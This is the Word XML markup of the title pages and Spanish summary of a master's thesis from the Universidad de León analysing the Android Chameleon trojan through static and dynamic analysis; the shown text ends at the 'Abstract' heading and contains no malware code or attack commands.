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1A263ED4" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="4845048F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="1ACCCEF9" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="3E2CE4F3" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="5B58047C" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="5AB0EA74" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="501F4313" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="5A5D0F0F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="3F17A683" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="095BD74B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2417"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F1AB6" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12907004" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="48EDD9DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>MÁSTER EN INVESTIGACIÓN EN CIBERSEGURIDAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A261043" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314AA6C5" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17EC9189" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="6997F08F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="04F49C35" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="48EDD9DA">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Trabajo de Fin de Máster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37195334" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6199C356" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E7A517" w14:textId="4932CAFC" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="48EDD9DA">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis de troyano </w:t>
      </w:r>
      <w:r w:rsidR="00A9370F">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Chameleon </w:t>
      </w:r>
      <w:r w:rsidRPr="48EDD9DA">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>en Android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB53DF1" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2316378B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265DA60A" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="48EDD9DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Autor: Raúl Núñez García</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B79F9A" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C72CC36" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="48EDD9DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tutor: Ángel Manuel Guerrero Higueras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B10F16F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640B038B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1593CBA2" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F7BB0D" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="00E95A92" w:rsidSect="00E95A92">
          <w:headerReference w:type="even" r:id="rId11"/>
          <w:headerReference w:type="default" r:id="rId12"/>
          <w:footerReference w:type="even" r:id="rId13"/>
          <w:footerReference w:type="default" r:id="rId14"/>
          <w:headerReference w:type="first" r:id="rId15"/>
          <w:footerReference w:type="first" r:id="rId16"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1418" w:left="1985" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:formProt w:val="0"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="48EDD9DA">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Julio 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CFBA36" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7727974F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:sectPr w:rsidR="00E95A92" w:rsidSect="00E95A92">
          <w:headerReference w:type="even" r:id="rId17"/>
          <w:headerReference w:type="default" r:id="rId18"/>
          <w:footerReference w:type="even" r:id="rId19"/>
          <w:footerReference w:type="default" r:id="rId20"/>
          <w:headerReference w:type="first" r:id="rId21"/>
          <w:footerReference w:type="first" r:id="rId22"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="2171" w:right="1417" w:bottom="1587" w:left="1701" w:header="1417" w:footer="1247" w:gutter="0"/>
          <w:pgNumType w:fmt="upperRoman" w:start="1"/>
          <w:cols w:space="720"/>
          <w:formProt w:val="0"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8772" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2827"/>
        <w:gridCol w:w="2977"/>
        <w:gridCol w:w="2968"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E95A92" w14:paraId="6062AEF8" w14:textId="77777777" w:rsidTr="00F47383">
        <w:trPr>
          <w:trHeight w:val="1833"/>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E4AEE8" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1500"/>
              </w:tabs>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:beforeAutospacing="1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1416C1D7" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>UNIVERSIDAD DE LEÓN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48171A7D" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Escuela de Ingenierías Industrial, Informática y Aeroespacial</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39600EE5" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>MÁSTER EN INVESTIGACIÓN EN CIBERSEGURIDAD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="352826BB" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Trabajo de Fin de Máster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95A92" w14:paraId="46BAC9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44DF5488" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">ALUMNO: </w:t>
            </w:r>
            <w:r>
              <w:t>Raúl Núñez García</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95A92" w14:paraId="1A9C4D41"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6D453B7" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">TUTOR: </w:t>
            </w:r>
            <w:r>
              <w:t>Ángel Manuel Guerrero Higueras</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95A92" w14:paraId="03D0E30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94C6BCF" w14:textId="64BEF177" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">TÍTULO: </w:t>
            </w:r>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Análisis de </w:t>
            </w:r>
            <w:r w:rsidR="00A66AA8">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>troyano Chameleon</w:t>
            </w:r>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> en Android</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95A92" w14:paraId="38605A96"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7FA3577D" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CONVOCATORIA:</w:t>
            </w:r>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> j</w:t>
            </w:r>
            <w:r>
              <w:t>ulio 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95A92" w14:paraId="2340C66F"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637FEFDA" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>RESUMEN:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E216359" w14:textId="334164A9" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">En este Trabajo de Fin de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Máster</w:t>
            </w:r>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> (TF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">) se </w:t>
            </w:r>
            <w:r w:rsidR="004463C0">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">ha llevado a cabo un análisis detallado de una muestra de malware de tipo troyano </w:t>
            </w:r>
            <w:r w:rsidR="00396426">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">que forma parte de la familia conocida como </w:t>
            </w:r>
            <w:r w:rsidR="004463C0">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Chameleon,</w:t>
            </w:r>
            <w:r w:rsidR="00396426">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> y</w:t>
            </w:r>
            <w:r w:rsidR="004463C0">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> que ha sido desarrollado </w:t>
            </w:r>
            <w:r w:rsidR="00396426">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">infectar dispositivos de la </w:t>
            </w:r>
            <w:r w:rsidR="004463C0">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>plataforma Android.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="366FF7CA" w14:textId="5CDF7849" w:rsidR="004463C0" w:rsidRDefault="004463C0" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Se ha aplicado un análisis estático del código del malware con una fase de deofuscación previa para hacer el código más legible y fácil de comprender. En este análisis se ha estudiado el código del malware para tratar de extraer una lista de posibles tareas que puede llevar a cabo durante su ejecución y los métodos que utiliza para poder tener éxito en la infección y sus pasos posteriores. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D828A28" w14:textId="043364EA" w:rsidR="004463C0" w:rsidRDefault="004463C0" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Paralelamente se ha llevado a cabo una fase de análisis dinámico, ejecutando el malware en un entorno controlado con dispositivos emulados, recabando información acerca de su comportamiento y realizando comparativas respecto a los datos extraídos en el análisis estático.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BA81FC0" w14:textId="38001D96" w:rsidR="004463C0" w:rsidRDefault="004463C0" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Finalmente, se ha documentado toda la información relevante extraída durante los procesos mencionados, tratando de plasmar el funcionamiento en detalle del malware, su peligrosidad y cómo encaja dentro del ecosistema actual de troyanos y malware en Android.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21ED2F6A" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95A92" w14:paraId="0A77D5C4" w14:textId="77777777" w:rsidTr="00F47383">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8772" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07094A66" w14:textId="059642A7" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Palabras clave:</w:t>
            </w:r>
            <w:r w:rsidR="00134310">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> malware, Android, troyano, infostealer, Chameleon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95A92" w14:paraId="477444DB" w14:textId="77777777" w:rsidTr="00F47383">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1539"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32508836" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Firma del alumno:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56864872" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78962C88" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>VºBº Tutor:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3437458F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00F47383">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="48EDD9DA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>VºBº Cotutor:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52827174" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71475E8E" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:sectPr w:rsidR="00E95A92" w:rsidSect="00E95A92">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="2171" w:right="1417" w:bottom="1587" w:left="1701" w:header="1417" w:footer="1247" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:formProt w:val="0"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A03719C"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512A4975" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="002F2591" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2591">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Abstract</w:t>
